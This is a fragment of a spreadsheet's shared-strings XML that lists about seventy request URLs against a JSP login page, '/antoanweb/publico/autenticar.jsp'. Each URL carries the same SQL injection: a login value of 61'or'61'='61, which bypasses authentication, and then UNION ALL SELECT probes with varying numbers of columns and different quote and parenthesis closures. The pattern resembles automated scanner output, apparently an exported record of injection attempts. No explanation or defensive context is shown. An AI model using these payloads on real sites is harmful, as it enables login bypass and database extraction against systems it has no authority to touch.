  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716,1716--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333,8333--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788,1788--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954,6954--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516,6516--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106,1106--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158,1158--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242,4242--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533,533--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401,3401--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879,879--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715,5715--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441,7441--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316,1316--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144,8144--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543,6543--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832,1832--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906,9906--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355,9355--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540,4540--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872,7872--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901,3901--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455,1455--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962,4962--and(5016=5016</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,5659--and(8776=8776</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303,1303--and(7348=7348</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995,1995--and(3621=3621</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698,1698--and(9152=9152</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093,9093--and(7476=7476</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621,621--and(9530=9530</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990--and(5947=5947</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655,2655--and(2762=2762</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954,7954--and(4356=4356</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033,6033--and((2091=2091</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540--and((7346=7346</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592,8592--and((2597=2597</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080--and((9694=9694</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531,4531--and((2512=2512</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441,9441--and((4158=4158</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691,5691--and((7011=7011</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210,2210--and((6928=6928</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811,4811--and((9588=9588</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174,3174--and((3208=3208</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095,7095--and(((6324=6324</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261,2261--and(((1130=1130</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220,5220--and(((6416=6416</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570,5570--and(((1247=1247</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963,8963--and(((7940=7940</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837,6837--and(((6078=6078</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098,9098--and(((2370=2370</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470,1470--and(((6818=6818</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602,7602--and(((3110=3110</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108,5108--and(((2456=2456</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068,9068--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920,7920--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278,5278--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771,3771--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756,7756--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439,1439--</t>
  </si>
  <si>
